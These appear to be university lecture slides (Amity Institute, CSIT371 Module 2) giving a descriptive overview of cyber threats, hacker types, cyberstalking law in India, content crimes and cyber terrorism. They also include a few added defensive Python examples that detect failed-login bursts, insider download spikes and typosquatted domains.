
Module 2

The document outlines key concepts in Cyber Security, including sources of security threats, motives behind cyber attacks, and various types of threats such as hacking, phishing, and malware. It emphasizes the importance of understanding the impact of these threats on individuals and organizations, as well as the need for effective countermeasures and preventive measures. Additionally, it categorizes different types of hackers and intruders, highlighting their motivations and methods.

Uploaded by

studentamity36

Amity Institute of Information Technology

CSIT371 – Cyber Security and Cyber Laws

Module 2: Cyber Security


• Sources of security threats, Motives, Target Assets
• Consequence of threats, E-mail threats, Web threats, Hacking, Intruders, Insider threats
• Cyber Squatting, Cyber Stalking, Crime of deception, Content Oriented Online Crime, Malicious Software use and detection
• Cyber Terrorism, Information warfare and surveillance, Virtual Crime, Online Frauds
• Identity Theft and Intellectual property theft, Network threats: Worms, Virus, Spam, Adware, Spyware
• Trojans and covert channels, Backdoors, Bots, IP spoofing, ARP spoofing
• Session hijacking, Sabotage, phishing, Zombie/Zombie Drone.
Dr. Partha Sarathi Chakraborty
AIIT, Amity University Uttar Pradesh Noida

The slides are used for educational purposes. Not support or used for

Cybersecurity Threats


Cyber Attack


Sources of Security Threats

• System resources
• Hardware, software (OS, apps), data (users, system, database), communication facilities and network (LAN, bridges, routers, …)
• Our concern: vulnerability of these resources (corrupted, unavailable, leaky)
• Threats exploit vulnerabilities
• An attack is a threat that is carried out
• Active or passive; from inside or from outside
• Countermeasures: actions taken to prevent, detect, recover and minimize risks

Security Terminology

Sources of Security Threats: Cyber Threat Actors

Motives
• Corporate Espionage, Business Disruption, or Financial Gain.
• Whatever the motivation, cybersecurity threats have become pervasive and continue to upend every facet of the digital realm.
• Beyond causing severe financial damage, cyberattacks can lead to regulatory penalties, lawsuits, reputational damage, and business continuity disruptions.
• No business or IT organization is safe in the present cyber world, as cybercriminals increasingly rely on sophisticated technologies to perform malicious attacks.
• Rapid adoption of emerging technologies, including AI, the Internet of Things (IoT), and cloud computing, has added new cyber threats for organizations while adding complexity to existing risks.

According to Verizon’s 2020 Data Breach Investigations Report (DBIR), 86% of cybersecurity breaches were financially motivated, and 10% were motivated by espionage.

Target Assets
• Cyber threat actors conduct malicious activity against anything connected to or residing on the Internet, including devices, information, financial resources, opinions, and reputations:
  • Devices
  • Information
  • Financial Resources
  • Opinions
  • Reputations


Examples of Threats


Security Concepts and Relationships


Threat consequences
• Unauthorized disclosure: threat to confidentiality
  • Exposure (release data), interception, inference, intrusion
• Deception: threat to integrity
  • Masquerade, falsification (alter data), repudiation
• Disruption: threat to integrity and availability
  • Incapacitation (destruction), corruption (backdoor logic), obstruction (interfere with communication, overload a line)
• Usurpation: threat to integrity
  • Misappropriation (theft of service), misuse (hacker gaining unauthorized access)


E-mail Threats

• Spam: Spam email is any unsolicited and unwanted junk email and is often sent for commercial purposes. When spam is sent out in massive volume by botnets to an indiscriminate recipient list, the goal is most likely to spread malware by infecting computer networks, for business
• Phishing: Phishing is sending fraudulent communications that appear to be from reputable sources, usually through email or texting. The end goal is to steal money or sensitive data like login information or to install malware or ransomware on the victim's machine. Phishing is a very common
• Malware: Malware refers to any intrusive software developed by cybercriminals to steal data and damage or destroy computers and computer systems. A common form of malware is ransomware. Recent malware attacks have exfiltrated data in the
• Business Email Compromise (BEC): BEC is a carefully planned and researched spoofing attack that strategically selects and impersonates a company, executive, vendor, or supplier. The end goal is often to trick someone into sending money over wire or granting
• Malicious Links: A malicious link is embedded in an email; it leads to a site that will attack a computer or a network. Often, the attack happens before the person can even click away from the site. This type of attack is most commonly a link sent from a spoofed account: the email address or name appears to be that of a friend or business associate. Often it will contain only the link, or it will say something like, “I found this for you…”
• Zero-Day Attacks: In a zero-day attack an attacker uses an unknown threat (yet to be discovered by anti-virus vendors, firewalls, and other systems). Email is the most common form of delivery of these types of attacks through malicious links or attachments. Once someone clicks the link or attachment in the email, the malicious code installs itself and exploits the unknown vulnerability.

Business Email Compromise

https://www.fbi.gov/news/stories/business-e-mail-compromise-on-the-rise

Web Threats
• Web threats are malicious activities or vulnerabilities that exploit the internet or web-based systems to compromise the security, privacy, or functionality of users, organizations, or systems.
• These threats target websites, web applications, browsers, and users, often leading to data breaches, financial losses, or reputational damage.
• Common Types of Web Threats: Phishing, Malware, SQL Injection (SQLi), Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Man-in-the-Middle (MITM) Attacks, Denial-of-Service (DoS) and Distributed DoS (DDoS) Attacks, Session Hijacking, Unsecured APIs, Ransomware via Websites
• Basic components to any web threat:
  • Threat motives give an intentional threat agent a reason or goal to cause harm. Some threat agents don’t act intentionally or act autonomously and may, therefore, be absent of motive.
  • Threat agents are anything or anyone that can negatively impact, with the internet either as a threat vector or a target itself.
  • Vulnerabilities include any human behavior weakness, technology systems, or other resources that can lead to a damaging exploit or incident.
  • Threat outcomes are the negative results of a threat agent acting against one or more vulnerabilities.

Web Threats (contd..)


• Types of threat agents
  • Non-human agents: Examples include malicious code (viruses, malware, worms, scripts), natural disasters (weather, geological), utility failure (electrical, telecom), technology failure (hardware, software), and physical hazards (heat, water, impact).
  • Intentional human agents: Based on malicious intent. Can be internal (employees, contractors, family, friends, acquaintances) and external (professional and amateur hackers, nation-state actors and agencies, competitor corporations).
  • Accidental human agents: Based on human error. Similar to intentional threats, this type can include internal and external agents.
  • Negligence-based human agents: Based on careless behaviors or safety oversights. Again, this category can also include internal and external agents.
• Mitigate Web Threats
  • Secure Web Applications: Implement robust input validation to prevent SQLi and XSS. Use secure authentication mechanisms and encrypted communications (e.g., HTTPS).
  • Regular Security Audits: Conduct vulnerability assessments and penetration testing.
  • Web Security Tools: Deploy firewalls, intrusion detection systems (IDS), and anti-malware solutions.
  • Educate Users: Train users to recognize phishing emails, avoid suspicious links, and use strong passwords.
  • Update and Patch Regularly: Keep software, frameworks, and plugins up-to-date to address known vulnerabilities.
  • Implement Strong Access Controls: Enforce role-based access and use multi-factor authentication.

Examples of web threats


Here are some of the more well-known examples:
• WannaCry ransomware
  • In May 2017, the WannaCry ransomware spread to many networks and locked down countless Windows PCs. This threat was particularly dangerous because of its worm functionality, allowing it to spread completely autonomously. WannaCry exploited a native communication language within Windows to spread this malicious code.
• Celebrity iCloud phishing
  • A spear-phishing attack led to the breach of numerous celebrity iCloud accounts. This breach ultimately resulted in the unauthorized leak of countless private photos from these accounts. While the attacker was eventually located and prosecuted, the victims are still suffering from their intimate photos being made public without their permission. This has become one of the most well-known phishing attacks of the decade.

https://www.kaspersky.com/resource-center/threats/ransomware-wannacry
https://www.bbc.com/news/technology-29237469

Hacking
• A hacker can use their skills to explore and improve technology systems.
• Hackers are often considered "computer criminals" who use their programming skills to hack or steal information.
• They may use automated programs to compromise a computer's security system.
• Hackers are typically very knowledgeable about technology and security.
• Hacking can have a significant impact, such as financial loss or costly repairs to computer systems.

Types of Hackers
• White Hat Hackers (Ethical Hackers): Work legally and ethically to identify vulnerabilities and help organizations improve security.
  • Example: Penetration testers who simulate attacks to strengthen a system's defenses.
• Black Hat Hackers (Malicious Hackers): Exploit vulnerabilities without permission for personal or financial gain, or to cause damage.
  • Example: Hackers who steal sensitive data to sell on the dark web.
• Grey Hat Hackers: Operate between ethical and unethical boundaries; may exploit vulnerabilities without malicious intent but without explicit permission.
  • Example: Reporting security flaws in a system they accessed without authorization.
• Script Kiddies: Inexperienced individuals who use pre-made tools and scripts to perform hacking without a deep understanding of the techniques involved.
  • Example: Running a DDoS tool downloaded from the internet.
• Hacktivists: Hackers motivated by political, social, or ideological goals, using hacking as a form of protest or activism.
  • Example: Defacing websites to highlight a political issue.
• State-Sponsored Hackers: Operate under government directives to carry out cyber espionage, sabotage, or attacks against other nations.
  • Example: Cyberattacks targeting critical infrastructure of rival countries.

Impact and Prevention


• Impacts of Hacking
  • For Individuals: Identity theft, financial losses, privacy breaches, and emotional distress.
  • For Organizations: Financial losses, reputational damage, legal liabilities, and operational disruptions.
  • For Governments: National security threats, espionage, and disruption of critical infrastructure.
• Ethical Hacking and Its Role
  • Ethical hacking involves using hacking techniques with permission to identify and mitigate vulnerabilities.
  • It plays a crucial role in: Enhancing cybersecurity, Protecting sensitive data, Preventing cyberattacks.
• Preventing Hacking
  • Strong Passwords and Multi-Factor Authentication: Use complex passwords and add layers of security to logins.
  • Regular Software Updates: Patch vulnerabilities by updating systems and applications.
  • Firewalls and Antivirus: Block unauthorized access and detect malware.
  • Educating Users: Train users to recognize phishing and avoid suspicious links or attachments.
  • Monitoring and Auditing: Continuously monitor systems for unusual activity and perform regular security audits.

Intruders
• An "intruder" is an external attacker who attempts to gain unauthorized access to a system from outside the organization, typically without legitimate credentials.
• Example: Attempting to breach a company's network by exploiting a vulnerability in their website.
• Motivations of Intruders: Financial Gain, Espionage, Revenge or Vandalism, Curiosity or Challenge, Hacktivism, Terrorism.
• Types of Intruders
  • External Intruders: Individuals or systems outside the organization who attempt to breach security barriers. Example: Hackers trying to infiltrate a company's network.
  • Internal Intruders: Trusted insiders, such as employees or contractors, who misuse their access to exploit systems. Example: An employee stealing sensitive customer data.
  • Automated Intruders (Bots): Programs or scripts designed to perform unauthorized actions, such as scanning for vulnerabilities or launching attacks. Example: Botnets performing Distributed Denial-of-Service (DDoS) attacks.

Intruders (Contd..)
• Indicators of Intrusion
  • Unusual Network Activity: High traffic from unknown sources or irregular data patterns.
  • Unauthorized Access Attempts: Multiple failed login attempts or logins from unfamiliar locations.
  • Changes in Files or Systems: Unexplained modifications, deletions, or the presence of unknown files.
  • System Slowdowns: Reduced performance due to unauthorized processes consuming resources.
  • Unexpected Alerts: Warnings from security software or logs indicating suspicious activity.
• Preventing Intrusions
  • Implement Strong Authentication: Use multi-factor authentication (MFA) and robust password policies.
  • Regularly Update and Patch Systems: Keep software up-to-date to close security vulnerabilities.
  • Install Security Solutions: Use firewalls, intrusion detection systems (IDS), and antivirus software.
  • Monitor and Audit: Continuously monitor networks and systems for suspicious activities.
  • Limit Access: Follow the principle of least privilege by granting users only the access they need.
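The "Unauthorized Access Attempts" indicator (multiple failed logins, logins from unfamiliar locations) can be turned into a small detector. This is an added example, not part of the original slides; the log format, the sample events and the `KNOWN_NETWORKS` baseline are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ipaddress

# Constructed sample authentication events (not real logs):
# TIMESTAMP user=<name> src=<ip> result=OK|FAIL
SAMPLE_LOG = """\
2024-05-01T09:00:05 user=alice src=198.51.100.10 result=OK
2024-05-01T09:02:11 user=bob src=198.51.100.23 result=FAIL
2024-05-01T09:02:40 user=bob src=198.51.100.23 result=OK
2024-05-02T02:13:01 user=alice src=203.0.113.7 result=FAIL
2024-05-02T02:13:04 user=alice src=203.0.113.7 result=FAIL
2024-05-02T02:13:09 user=alice src=203.0.113.7 result=FAIL
2024-05-02T02:13:15 user=alice src=203.0.113.7 result=FAIL
2024-05-02T02:13:22 user=alice src=203.0.113.7 result=FAIL
2024-05-02T02:14:02 user=alice src=203.0.113.7 result=OK
2024-05-02T10:30:00 user=bob src=198.51.100.40 result=OK
"""

# Assumed baseline: networks each user normally logs in from.
KNOWN_NETWORKS = {
    "alice": [ipaddress.ip_network("198.51.100.0/24")],
    "bob": [ipaddress.ip_network("198.51.100.0/24")],
}


def parse_line(line):
    """Parse one constructed log line into a dict."""
    timestamp, *fields = line.split()
    kv = dict(field.split("=", 1) for field in fields)
    return {
        "time": datetime.fromisoformat(timestamp),
        "user": kv["user"],
        "src": ipaddress.ip_address(kv["src"]),
        "ok": kv["result"] == "OK",
    }


def detect(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (kind, user, source_ip) tuples, in log order."""
    alerts = []
    failures = defaultdict(deque)  # (user, src) -> recent failure times
    bursting = set()               # keys that already raised a burst alert
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        key = (ev["user"], ev["src"])
        recent = failures[key]
        # Forget failures that fell out of the sliding window.
        while recent and ev["time"] - recent[0] > window:
            recent.popleft()
        if not recent:
            bursting.discard(key)
        if not ev["ok"]:
            recent.append(ev["time"])
            if len(recent) >= threshold and key not in bursting:
                bursting.add(key)
                alerts.append(("FAILED_LOGIN_BURST", ev["user"], str(ev["src"])))
            continue
        # Successful login: check the source against the user's baseline.
        nets = KNOWN_NETWORKS.get(ev["user"], [])
        if not any(ev["src"] in net for net in nets):
            alerts.append(("UNFAMILIAR_SOURCE", ev["user"], str(ev["src"])))
        # A success right after a burst suggests the guessing worked.
        if key in bursting:
            alerts.append(("SUCCESS_AFTER_BURST", ev["user"], str(ev["src"])))
        failures.pop(key, None)
        bursting.discard(key)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A single mistyped password (bob) raises nothing, while the five failures followed by a success from an unknown network (alice) raise all three alerts.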

Insider Threats
An insider threat is a security risk that comes from someone within an organization who has access to sensitive information or privileged accounts and misuses it. Insider threats can be intentional or unintentional, and can come from a variety of people, including current or former employees, contractors, vendors, and interns.

Difficult to Detect
• Insider threats are difficult to detect because traditional security measures are often ineffective against them. Some signs of an insider threat include:
  • Unusual access times, such as signing into the network at odd hours
  • Unusual spikes in network traffic
  • Accessing resources that are not relevant to their job function
  • Using unauthorized devices, such as USB drives
  • Emailing sensitive information outside the organization
  • Excessive spikes in data downloads
  • Using tools like AirDrop to transfer files
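Two of the signs listed above, unusual access times and excessive spikes in data downloads, only mean something relative to each user's own normal behaviour. The sketch below is an added example, not part of the original slides: the activity records are constructed, and the modified z-score with a 3.5 cut-off is one common choice of outlier test, assumed here.

```python
from statistics import median

# Constructed baseline: per-user history of (login_hour_24h, megabytes_downloaded).
BASELINE = {
    "carol": [(9, 120), (9, 95), (8, 110), (10, 130), (9, 105),
              (9, 90), (8, 115), (9, 100), (10, 125), (9, 110)],
    "dave": [(10, 150), (11, 140), (10, 160), (9, 135),
             (10, 145), (10, 155), (11, 150), (10, 140)],
}

# Constructed observations for the day under review: (user, login_hour, megabytes).
TODAY = [("carol", 2, 5400), ("dave", 10, 130), ("erin", 14, 60)]


def modified_z(value, samples):
    """Outlier score based on the median and the median absolute deviation."""
    med = median(samples)
    mad = median([abs(s - med) for s in samples])
    if mad == 0:
        # All history identical: any larger value is an extreme outlier.
        return float("inf") if value > med else 0.0
    return 0.6745 * (value - med) / mad


def usual_hours(hours, slack=1):
    """Hours seen in the baseline, widened by `slack` hours on each side."""
    return {(h + d) % 24 for h in hours for d in range(-slack, slack + 1)}


def review(today, baseline, z_limit=3.5):
    """Return {user: [flags]} for users whose activity departs from baseline."""
    findings = {}
    for user, hour, megabytes in today:
        history = baseline.get(user)
        if not history:
            # No history to compare against: surface it instead of guessing.
            findings[user] = ["NO_BASELINE"]
            continue
        flags = []
        if hour not in usual_hours([h for h, _ in history]):
            flags.append("OFF_HOURS_LOGIN")
        if modified_z(megabytes, [m for _, m in history]) > z_limit:
            flags.append("DOWNLOAD_SPIKE")
        if flags:
            findings[user] = flags
    return findings


if __name__ == "__main__":
    for user, flags in review(TODAY, BASELINE).items():
        print(user, flags)
```

Only upward deviations in download volume are flagged; a quiet day (dave) is not treated as suspicious.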

Insider Threats Example

[Figure: popular examples of insider threat incidents, each shown with its impact and source. Legible labels: "Airlines", "Cash App".]
• Impacts shown: data exposure; leak of customer data; massive data breach; triple data breach; code repositories stolen; intellectual property theft; data theft
• Sources shown: cloud misconfiguration by a system administrator; malicious activity by a former employee; malicious activity by former employees; social engineering attacks on employees; malicious insider activity for personal gain; malicious insider actions (former employee); third-party vendor compromise

Cyber Squatting
• Cybersquatting refers to the act of registering or using a domain name to profit from a trademark, corporate name, or personal name of an individual.
• Types of Cyber Squatting: Typosquatting, Identity theft, Name jacking, Reverse Cyber Squatting

Types of Cyber Squatting


• Typosquatting: Typosquatting focuses on altering a domain's original spelling by introducing or deleting numbers, letters, or periods. It also entails changing the sequence of the letters or words inside a domain. In essence, typosquatting refers to taking advantage of potential typos.
• Identity theft: An attacker assumes the online persona of a legitimate business by registering a domain that looks identical to the target's. Users trying to reach the company's site via the web can accidentally access the phishing domain. Domain squatting involving identity theft also occurs when a hacker acquires a previously registered domain whose owner has let the registration lapse.
• Name jacking: It occurs when a squatter creates a false website using the real name of a famous person. This is frequently the situation when, for example, domains or, more maliciously, social media profiles are registered in the names of celebrities by cybersquatters. It may not always be possible to prove that name jacking was done on purpose, making prosecution of the crime challenging.
• Reverse Cyber Squatting: Reverse domain name hijacking (RDNH), also known as reverse cybersquatting, is a technique that is, in some ways, the opposite of cybersquatting. While purchasing a domain name that contains a trademark with the goal of making money off that trademark is cybersquatting, reverse domain hijacking is a little different. It happens when a person or business makes a false claim that she, he, or it owns a trademark and then takes unjustified steps to take your legitimate domain name away.
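A brand owner can screen newly observed domain names for the alterations the typosquatting definition lists: an inserted or deleted number, letter or period, or a changed sequence of letters. The checker below is an added example, not part of the original slides; `mybank.example` and the observed names are constructed, and it also reports single-character substitutions, which goes one step beyond the slide's list.

```python
def char_kind(ch):
    """Classify a character the way the typosquatting definition does."""
    if ch == ".":
        return "period"
    if ch.isdigit():
        return "digit"
    if ch.isalpha():
        return "letter"
    return "character"


def normalize(name):
    """Lower-case a domain name and drop a trailing root dot."""
    return name.strip().lower().rstrip(".")


def single_edit(original, candidate):
    """Describe the one edit that turns original into candidate, else None."""
    if original == candidate:
        return None
    lo, lc = len(original), len(candidate)
    if lo == lc:
        diff = [i for i in range(lo) if original[i] != candidate[i]]
        if len(diff) == 1:
            return "substituted " + char_kind(candidate[diff[0]])
        if (len(diff) == 2 and diff[1] == diff[0] + 1
                and original[diff[0]] == candidate[diff[1]]
                and original[diff[1]] == candidate[diff[0]]):
            return "transposed characters"
        return None
    if lc == lo + 1:
        # Candidate has one extra character somewhere.
        for i in range(lc):
            if candidate[:i] + candidate[i + 1:] == original:
                return "inserted " + char_kind(candidate[i])
        return None
    if lc == lo - 1:
        # Candidate is missing one character of the original.
        for i in range(lo):
            if original[:i] + original[i + 1:] == candidate:
                return "deleted " + char_kind(original[i])
        return None
    return None


def find_typosquats(protected, observed):
    """Return (domain, edit) for observed names one edit away from protected."""
    target = normalize(protected)
    hits = []
    for name in observed:
        edit = single_edit(target, normalize(name))
        if edit is not None:
            hits.append((normalize(name), edit))
    return hits


# Constructed sample: a protected name and domains seen in, e.g., DNS logs.
PROTECTED = "mybank.example"
OBSERVED = [
    "mybnak.example",    # letters swapped
    "mybank1.example",   # digit added
    "mybnk.example",     # letter dropped
    "my.bank.example",   # period added
    "mybank.example",    # the legitimate name itself
    "weather.example",   # unrelated
    "MyBamk.example.",   # one letter replaced, mixed case, trailing dot
]

if __name__ == "__main__":
    for domain, edit in find_typosquats(PROTECTED, OBSERVED):
        print(f"{domain}: {edit}")
```

The legitimate name and the unrelated name are not reported; names more than one edit away are out of scope for this check.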

Cyber Stalking
• Cyberstalking refers to the use of the internet, social media, email, or other digital technologies to harass, threaten, or intimidate an individual.
• Unlike traditional stalking, which involves physical proximity, cyberstalking is carried out online, making it easier for perpetrators to target victims anonymously and from a distance.
• Key Characteristics of Cyberstalking
  • Persistent and Repeated Behavior: The stalker repeatedly contacts or monitors the victim despite being asked to stop.
  • Harassment or Threats: Messages or actions that create fear, distress, or discomfort for the victim.
  • Use of Digital Platforms: Involves emails, text messages, social media, forums, or even hacking into personal accounts.
  • Anonymity: Cyberstalkers often hide their identity, making it difficult to trace them.

Cyberstalking
• Common Tactics Used in Cyberstalking
  • Unwanted Communication: Sending excessive emails, messages, or texts to the victim.
  • Social Media Surveillance: Constantly monitoring the victim’s online activities, posts, and interactions.
  • Impersonation: Creating fake profiles to interact with the victim or damage their reputation.
  • Doxxing: Publicly revealing the victim’s personal information, such as their address or phone number.
  • Threats and Intimidation: Sending messages or posts that threaten harm to the victim or their loved ones.
  • Hacking and Spying: Gaining unauthorized
• Impacts of Cyberstalking
  • Emotional and Psychological Distress: Anxiety, depression, fear, and loss of a sense of safety.
  • Social Isolation: Victims may avoid social media or online platforms to escape harassment.
  • Reputational Damage: False information or impersonation can harm the victim's personal or professional reputation.
  • Physical Threats: Cyberstalking can escalate to physical stalking or violence in extreme cases.
  • Financial Loss: Victims may incur costs to enhance digital security or recover from hacking incidents.

Legal Protections against Cyberstalking in India
• Cyberstalking is a punishable offense in India, and there are several laws that protect against it, including:
  • Section 354 (D) of the IPC: Punishes stalking with up to three years in prison and a fine on the first conviction
  • Section 507 of the IPC: Punishes criminal intimidation by anonymous communication
  • Section 509 of the IPC: Punishes actions that intend to insult a woman's modesty, including lewd comments, gestures, or images sent over the internet
  • Section 67 of the IT Act: Punishes sending or posting obscene content to a victim via electronic media with up to five years in jail and a fine of up to one lakh rupees
  • Section 66C of the IT Act: Punishes identity theft with up to three years in prison and a fine of up to one lakh rupees
  • Section 66E of the IT Act: Deals with the violation of a person's privacy

Crime of Deception
• Deception is a legal concept that refers to the act of intentionally misleading someone to gain an unfair advantage or cause harm. It can be a criminal offense or grounds for legal action in contract law.
• In criminal law, deception can include:
  • Obtaining property by deception
  • Obtaining a money transfer by deception
  • Obtaining pecuniary advantage by deception
  • Procuring the execution of a valuable security by deception
  • Obtaining services by deception
  • Evasion of liability by deception
• In contract law, deception is known as misrepresentation or fraudulent misrepresentation.
• In India, Section 415 of the Code of India states that anyone who fraudulently or dishonestly deceives a person to deliver property or consent to the retention of property is guilty of a crime.

Crime of Deception (Cyber Crime)


• Cyber deception and theft is a type of cybercrime that involves a perpetrator gaining a victim's trust through a computer system and then exploiting them fraudulently. Cybercriminals often use a combination of real and false information to deceive their victims.
• Cybercrime is a broad category of criminal activities that use digital devices and networks to commit various crimes, including:
  • Fraud: Cybercriminals may use computers to commit fraud, such as credit card fraud or impersonation.
  • Identity theft: Cybercriminals may steal a victim's identity by using their electronic signature, password, or other unique identification feature.
  • Data breaches: Cybercriminals may exploit vulnerabilities in computer systems and networks to steal sensitive information.
  • Malware: Cybercriminals may infect computers with malware to damage devices, steal data, or stop users from using a website or network.
  • Denial-of-Service (DoS) attacks: Cybercriminals may use computers to prevent a business from providing a software service to its customers.
• To report a cybercrime complaint, you can use the Cyber Crime Portal. You can also contact the platform provider if you are being cyberbullied on a platform like Facebook or Instagram. If you feel threatened, you should call the police immediately.

Content Oriented Online Crime (COC)
• It refers to illegal or harmful activities conducted through the creation, sharing, or manipulation of digital content. This type of crime involves using online platforms to disseminate material that violates legal, ethical, or moral boundaries, targeting individuals, groups, or societies.
• Key Characteristics
  • Content as the Medium: The primary weapon is digital content, such as text, images, videos, or audio files.
  • Wide Reach: The internet enables rapid and extensive distribution, often targeting global audiences.
  • Anonymity: Perpetrators can mask their identities using encryption, pseudonyms, and the dark web.
  • Psychological Impact: Crimes often aim to manipulate emotions, beliefs, or behaviors.


Types of COC
• Cyber Defamation: Publishing false or defamatory statements online to harm an individual's or organization's reputation.
  • Example: Posting false allegations on social media about a public figure.
• Hate Speech: Sharing content that incites violence, discrimination, or hostility against specific groups based on race, religion, ethnicity, gender, etc.
  • Example: Viral posts promoting xenophobia.
• Cyberbullying and Harassment: Using online platforms to intimidate, threaten, or humiliate individuals.
  • Example: Sending abusive messages or sharing embarrassing photos without consent.
• Child Exploitation Material: Creation, distribution, or possession of content involving the exploitation of minors.
  • Example: Hosting or sharing illegal content on file-sharing platforms.
• Fake News and Misinformation: Disseminating false or misleading information to manipulate public opinion or cause harm.
  • Example: Spreading unverified health-related claims during a pandemic.
• Intellectual Property Theft: Unauthorized use, reproduction, or distribution of copyrighted material.
  • Example: Pirated movies, software, or books uploaded to torrent websites.
• Online Radicalization: Distributing extremist propaganda to recruit individuals into terrorist organizations.
  • Example: Using encrypted messaging apps to circulate ideological content.
• Revenge Porn: Sharing explicit images or videos of someone without their consent to harm their reputation or privacy.
  • Example: Uploading private photos to social media or adult websites.
• Scams and Fraud: Deceptive content aimed at tricking individuals into financial loss.
  • Example: Fake investment schemes advertised through fraudulent websites.
• Online Gaming and Forum Abuse: Using online gaming platforms or forums to spread toxic, illegal, or harmful content.
  • Example: Sharing links to illicit material in gaming chats.


Impacts of COC
• Social Impact:
  • Erosion of trust in online platforms.
  • Psychological trauma for victims.
  • Polarization and societal division through hate speech and fake news.
• Economic Impact:
  • Losses from scams, fraud, and intellectual property theft.
  • Financial burden on companies to address cybersecurity and content moderation.
• Legal and Ethical Impact:
  • Strain on law enforcement agencies to track and prosecute offenders.
  • Ethical dilemmas about censorship and freedom of speech.
• Technological Impact:
  • Increased demand for AI-driven content moderation tools.
  • Emergence of counter-technologies like deepfake detection.


Challenges in Combating COC


• Volume and Speed: Large volumes of content are created and shared rapidly, overwhelming monitoring systems.
• Global Jurisdiction: Crimes often cross national boundaries, complicating enforcement.
• Anonymity: Perpetrators use VPNs, encryption, and the dark web to avoid detection.
• Evolving Technologies: Sophisticated tools like deepfakes make it harder to identify manipulated content.
• Balancing Freedom and Security: Governments must balance the need for content regulation with protecting freedom of expression.


Prevention and Mitigation Strategies (COC)

Content Moderation:
• Platforms employ AI and human moderators to detect and remove harmful content.
• Example: Social media algorithms flagging hate speech.

Legislation:
• Enforcing laws against defamation, cyberbullying, and exploitation.
• Example: GDPR in the EU to regulate data protection and online privacy.

Awareness Campaigns:
• Educating users about recognizing and reporting harmful content.
• Example: Anti-cyberbullying initiatives in schools.

Technological Solutions:
• Using machine learning models to detect deepfakes or fake news.
• Example: Tools like Google’s Fact Check Explorer.

International Cooperation:
• Cross-border collaboration for investigation and prosecution.
• Example: Interpol’s efforts against online child exploitation.

Content-oriented online crime represents a significant challenge in the digital era, affecting individuals, organizations, and
societies. Effective countermeasures require a combination of technological innovation, robust legislation, and public
awareness, all while maintaining a balance between security and freedom of expression.

Malicious Software Use and Detection
• "Malicious software," often called "malware," refers to any
program designed to intentionally harm a computer
system or network.
• "Malware detection" is the process of identifying and
stopping such malicious software using specialized
security tools like antivirus software, aiming to protect
systems from damage caused by viruses, Trojans,
ransomware, and other harmful programs.
• Essentially, cybercriminals use malware to steal personal
information, disrupt operations, or extort money, while
security software is designed to detect and remove it.

Cyber Terrorism
• Cyberterrorism is the use of the Internet to conduct violent acts that result in, or
threaten, the loss of life or significant bodily harm, in order to achieve political
or ideological gains through threat or intimidation.
• Emerging alongside the development of information technology, cyberterrorism involves acts of deliberate, large-scale disruption of computer networks, especially of personal computers attached to the Internet, by means of tools such as computer viruses, computer worms, phishing, malicious software, hardware methods, and programming scripts, all of which can be forms of internet terrorism.
• Cyberterrorism can also be defined as the intentional use of computers, networks, and the public internet to cause destruction and harm for personal objectives.
• Experienced cyberterrorists, who are very skilled in terms of hacking, can cause massive damage to government systems and might leave a country in fear of further attacks.
• The objectives of such terrorists may be political or ideological since this can be
considered a form of terror.

Cyber Terrorism
Characteristics of Cyber Terrorism
1. Digital Nature: Cyber terrorism operates in the virtual domain, targeting computer systems, networks, and information.
2. Anonymity: Attackers often operate anonymously, making it challenging to attribute the attacks to specific individuals or groups.
3. Low Cost and High Impact: Cyber attacks are relatively inexpensive to execute but can cause significant disruption and economic loss.
4. Global Reach: Cyber terrorism transcends geographic boundaries, affecting victims worldwide.

Key Objectives
• Disruption: Paralyzing critical infrastructures such as power grids, financial systems, healthcare, transportation, and communication networks.
• Psychological Impact: Instilling fear and uncertainty among populations.
• Espionage: Stealing sensitive information to undermine national security or gain a strategic advantage.
• Economic Damage: Causing financial loss through attacks like ransomware or denial-of-service (DoS) operations.
• Propaganda: Spreading extremist ideologies and recruiting members via online platforms.


Cyber Terrorism
Examples of Cyber Terrorism
1. Stuxnet (2010): A sophisticated malware allegedly developed to disrupt Iran's nuclear program by targeting its industrial control systems.
2. WannaCry Ransomware Attack (2017): A global ransomware attack that crippled businesses, hospitals, and government services.
3. Power Grid Attacks: Cyber terrorists have targeted power grids in Ukraine (2015), leading to widespread blackouts.
4. Cyber Espionage: Persistent threats from state-backed or independent groups targeting sensitive government data.

Challenges in Countering Cyber Terrorism
1. Attribution: Difficulty in identifying perpetrators due to anonymizing technologies.
2. Jurisdictional Issues: Cyber crimes often cross national boundaries, complicating enforcement.
3. Technological Sophistication: Rapid evolution of cyber attack techniques outpaces defensive capabilities.
4. Lack of Awareness: Limited public understanding of cyber security risks.

Cyber Terrorism
Impact of Cyber Terrorism
• Economic Loss: Billions of dollars lost annually due to data breaches, ransomware payments, and recovery costs.
• National Security: Threats to defense, intelligence, and critical infrastructures.
• Social Chaos: Disruption of essential services like healthcare, banking, and transportation.
• Psychological Fear: Public fear and loss of trust in digital systems.

Preventive Measures
1. Strengthening Cybersecurity Infrastructure: Robust firewalls, intrusion detection systems, and encryption protocols.
2. International Cooperation: Cross-border collaboration to address the global nature of cyber threats.
3. Public Awareness Campaigns: Educating users about safe online practices and the risks of cyber terrorism.
4. Legislative Frameworks: Enacting and enforcing laws against cyber terrorism.
5. Incident Response Teams: Establishing rapid response mechanisms to mitigate attacks.

Information Warfare and Surveillance
• Information Warfare refers to the use and management of information and
communication technologies to gain a competitive edge over adversaries in a
conflict.
• It encompasses a range of activities designed to influence, disrupt, or manipulate
the decision-making capabilities of opponents while protecting one's own
information systems and strategies.
• Objectives of Information Warfare
• Gain intelligence superiority.
• Influence public opinion and morale.
• Disrupt enemy communication and decision-making.
• Protect critical information assets.
• Real-World Examples
• Russia-Ukraine Conflict (2022): Extensive use of cyber attacks and disinformation
campaigns by both sides.
• 2016 U.S. Elections: Alleged interference through misinformation and hacking.


Information Warfare and Surveillance


Key Components of Information Warfare
1. Psychological Operations (PsyOps): Disseminating information to influence the emotions, motives, or reasoning of target audiences. Example: Propaganda campaigns to demoralize enemy forces.
2. Electronic Warfare (EW): Using electromagnetic spectrum operations to disrupt or degrade enemy communication and radar systems. Example: Jamming enemy communication signals during combat.
3. Cyber Warfare: Employing cyber tools to attack an adversary's information systems, steal sensitive data, or disrupt operations. Example: Hacking into military databases to gather intelligence.
